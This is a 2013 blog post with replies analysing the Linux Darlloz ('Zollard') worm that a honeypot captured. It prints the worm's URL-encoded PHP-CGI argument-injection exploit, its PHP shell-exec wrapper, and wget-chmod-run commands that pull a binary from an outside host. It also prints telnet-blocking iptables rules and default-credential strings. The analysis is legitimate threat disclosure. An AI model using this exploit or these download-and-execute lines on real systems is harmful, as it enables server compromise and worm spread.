Recently my nepenthes stopped working. Looking into the last log – lines I found a wget – line:
[12112013 06:25:07 debug info fixme] File info submitted (ebee4228eb3443cd
8d55228733b8c1c6, http://www.gpharma.co/x86)
So I took a a look at this binary which I could download from this location.
# file x86
x86: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
Next look: try “strings”:
first nothing new.. but then I saw:
/proc/self/exe
POST
?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%6
4+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%
73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%
75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%
72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%
65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%
5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%
74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1
Host:
User-Agent: Zollard
Content-Type: application/x-www-form-urlencoded
Content-Length:
Connection: close
<?php
$disablefunc = @ini_get(“disable_functions”);
if (!empty($disablefunc))
$disablefunc = str_replace(” “,””,$disablefunc);
$disablefunc = explode(“,”,$disablefunc);
What the heck..? And who is “zollard”?
#### Update ####
The POST Part resolves to:
?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions=”” -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n
###############
further on:
function myshellexec($cmd)
global $disablefunc;
$result = “”;
if (!empty($cmd))
if (is_callable(“exec”) and !in_array(“exec”,$disablefunc)) {exec($cmd,$
result); $result = join(“n”,$result);}
elseif (($result = `$cmd`) !== FALSE) {}
elseif (is_callable(“system”) and !in_array(“system”,$disablefunc)) {$v
= @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_content
s(); @ob_clean(); echo $v;}
elseif (is_callable(“passthru”) and !in_array(“passthru”,$disablefunc))
{$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_c
ontents(); @ob_clean(); echo $v;}
elseif (is_resource($fp = popen($cmd,”r”)))
$result = “”;
while(!feof($fp)) {$result .= fread($fp,1024);} pclose($fp);
return $result;
myshellexec(“wget -O /tmp/x86 http://www.solarteure-landkirchen.de/solar/x
86”);
myshellexec(“chmod +x /tmp/x86”);
myshellexec(“/tmp/x86”);
Now the binary loads another binary, executes it and starts a webserver?
myshellexec(“wget -O /tmp/x86 http://www.solarteure-landkirchen.de/solar/x
86”);
myshellexec(“chmod +x /tmp/x86”);
myshellexec(“/tmp/x86”);
HTTP/1.1 200 OK
httpd
A few lines more: It installes “iptables”, droppes every telnet connection ands starts
its own telnet-daemon:
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/ip_tables.ko
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/iptable_filter.ko
iptables -D INPUT -p tcp –dport 23 -j DROP
iptables -A INPUT -p tcp –dport 23 -j DROP
telnetd
In the end the program destroys its sources (rm -rf) and runs in
mkdir -p
/var/run/.zollard/
The last lines:
chmod +x
cp /bin/sh
1234
12345
dreambox
smcadmin
stemroot
0!0
SHA1
So it ends up with some kind of crypto..
Virustotal shows a hitrate of 2 out of 47, well, it is no windows binary..
Anyone seen this before? Who is zollard? Where did the binary got the necessary root-credentials
from? I guess I have to take a further look..
###
Update
There were quite a lot of download-trials today:
# grep gpharma nepenthes.log | wc -l
33348
which is from the log-lines:
[12112013 09:23:43 debug info fixme] File info submitted (ebee4228eb3443cd8d55228733b8c1c6, http://www.gpharma.co/x86)
[12112013 09:23:43 debug info fixme] File upload requested (ebee4228eb3443cd8d55228733b8c1c6, http://www.gpharma.co/x86)
#### Update 2 ###
I executed the script on a linux vmware after adding “o+x” rights to the binary.
The iptables lines generate errors:
error inserting … ip_tables.ko – Unknown symbol in module
Immediatly the machine starts exchanging traffic with 117.201.16.108 : 58455
ans starts also listening on this port 58455
Looks like my machine started scanning the ip-range 117.201.16.* on that port –
I receive answers from there… No httpd oder telnetd daemons are listening in “ps”, which I expected.
The command “pstree” shows a httpd, though! Different childrens are running, the last one has a connection
to 117.201.18.22..23..24.. Looks like the “ps”executable has been changed.
Will see, what else can be found. Now it is “St. Martin” – time..:-)
Thank you for pointing that out. Luckily (up to now) the
malware only hit my stand-alone honeypot. So this one is
the spamming refrigerator..:-)
best greetings,
scooba
Hi!
I guess you figured that, but that’s the Linux/Darlloz malware.
See http://www.deependresearch.org/2013/12/hey-zollard-leave-my-internet-of-things.html
or
http://www.symantec.com/connect/blogs/linux-worm-targeting-hidden-devices
Did you have any other embedded Linux device connected to your network? like a webcam, home automation, wii etc? Might be worth checking them.
Best regards